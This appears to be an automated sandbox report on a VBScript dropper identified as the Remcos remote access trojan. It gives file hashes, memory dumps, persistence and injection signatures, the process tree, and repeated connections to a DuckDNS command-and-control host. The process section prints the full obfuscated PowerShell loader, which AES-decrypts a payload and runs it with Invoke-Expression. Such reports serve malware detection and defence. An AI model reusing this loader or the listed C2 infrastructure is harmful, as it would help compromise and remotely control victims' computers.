CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp

Files

memory/2916-4-0x00000237E6750000-0x00000237E6772000-memory.dmp

memory/2916-5-0x00007FFA38430000-0x00007FFA38E1C000-memory.dmp

memory/2916-7-0x00000237FE9B0000-0x00000237FE9C0000-memory.dmp

memory/2916-9-0x00000237FE9B0000-0x00000237FE9C0000-memory.dmp

memory/2916-10-0x00000237FEB40000-0x00000237FEBB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zv00cg1g.res.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2916-25-0x00000237FE9B0000-0x00000237FE9C0000-memory.dmp

memory/2916-26-0x0000023780000000-0x00000237807A6000-memory.dmp

memory/2916-29-0x00000237FEBC0000-0x00000237FEBCC000-memory.dmp

memory/2916-34-0x0000023FFF520000-0x0000023FFF53E000-memory.dmp

memory/3172-37-0x00007FFA38430000-0x00007FFA38E1C000-memory.dmp

memory/3172-40-0x000001B32D730000-0x000001B32D740000-memory.dmp

memory/3172-41-0x000001B32D730000-0x000001B32D740000-memory.dmp

memory/4172-60-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3172-61-0x000001B32D730000-0x000001B32D740000-memory.dmp

memory/4172-68-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3172-70-0x00007FFA38430000-0x00007FFA38E1C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 f6c90ab0db80c6c3ea92556fda7273c7
SHA1 01d3866b1887cbb0abe9701f6b49c5dbc66a7dfa
SHA256 a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269
SHA512 aa6b71e3a8fa46702787d190e3633b1ead0f66cce81065fa2262dde59c683a7fc48846fa2b0bbe94a050564855fc7a79842f0abfa53cc3315e4c766b3c4c1fbe

memory/4172-72-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-74-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2916-71-0x00007FFA38430000-0x00007FFA38E1C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 679c08c2fcef41f7ff70c991404bbc84
SHA1 efb3707a241424adc528888f9f161d04be21ef69
SHA256 049e9c3cc1fd8c01c6f980e8e87070d02fafa41eae7d60376b939552e7942dc1
SHA512 1f2d713f8f3e77efaa7484bdc463ab47541b4673b1e35e77437c87cb7682185b4b76a3823768f5ceb100d7d1c0c73f123282fd4715355f3bdde4228eb455c763

memory/4172-75-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-77-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-78-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-79-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-80-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-81-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-82-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-83-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-84-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-85-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-86-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-88-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-89-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-90-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-91-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-92-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-93-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-95-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-96-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-97-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-98-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-99-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-100-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-102-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-103-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-104-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-105-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-106-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-107-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-108-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-109-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-111-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-112-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-113-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-114-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-115-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-116-0x0000000000400000-0x0000000000482000-memory.dmp

C:\ProgramData\remcos\registros.dat

MD5 bf306e98b8575f3eb0fa3b040090ef41
SHA1 a50e3c21a00c91aa9af6074816ae9b76dd86c1c0
SHA256 b0e14b0220c5c706e1f98ff3754f20a7fa1f9b0d3a31555a645a690423770644
SHA512 8ddf6857be95e63bdd759c60a888b44f12573b49a57abb5925763b3d7ae6b27363136f43472264bc88e1d38e63357aee52a641fd05481c126af24051e982f5b1

memory/4172-118-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-119-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-120-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-121-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-122-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-123-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-124-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-125-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-127-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-128-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-129-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-130-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-131-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-132-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-133-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-135-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-136-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-137-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-138-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-139-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4172-140-0x0000000000400000-0x0000000000482000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2023-12-05 18:38

Reported

2023-12-05 18:44

Platform

win10v2004-20231127-en

Max time kernel

300s

Max time network

305s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"

Signatures

Remcos

rat remcos

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3028534956-1709433221-1313273668-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1348 set thread context of 4388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3680 wrote to memory of 1348 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3680 wrote to memory of 1348 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1348 wrote to memory of 688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
PID 1348 wrote to memory of 688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
PID 1348 wrote to memory of 4680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1348 wrote to memory of 4680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1348 wrote to memory of 4680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1348 wrote to memory of 4388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1348 wrote to memory of 4388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1348 wrote to memory of 4388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1348 wrote to memory of 4388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1348 wrote to memory of 4388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1348 wrote to memory of 4388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1348 wrote to memory of 4388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1348 wrote to memory of 4388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1348 wrote to memory of 4388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1348 wrote to memory of 4388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1348 wrote to memory of 4388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1348 wrote to memory of 4388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '58417081275505453806';$MqDDxKjJmA = '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';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU

C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\google.vbs

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 138.255.221.88.in-addr.arpa udp
US 8.8.8.8:53 paste.ee udp
US 188.114.96.0:443 paste.ee tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 226.173.246.72.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 remccoss2023.duckdns.org udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 155.162.142.181.in-addr.arpa udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 61.122.16.96.in-addr.arpa udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 81.254.221.88.in-addr.arpa udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 remccoss2023.duckdns.org udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 remccoss2023.duckdns.org udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 remccoss2023.duckdns.org udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
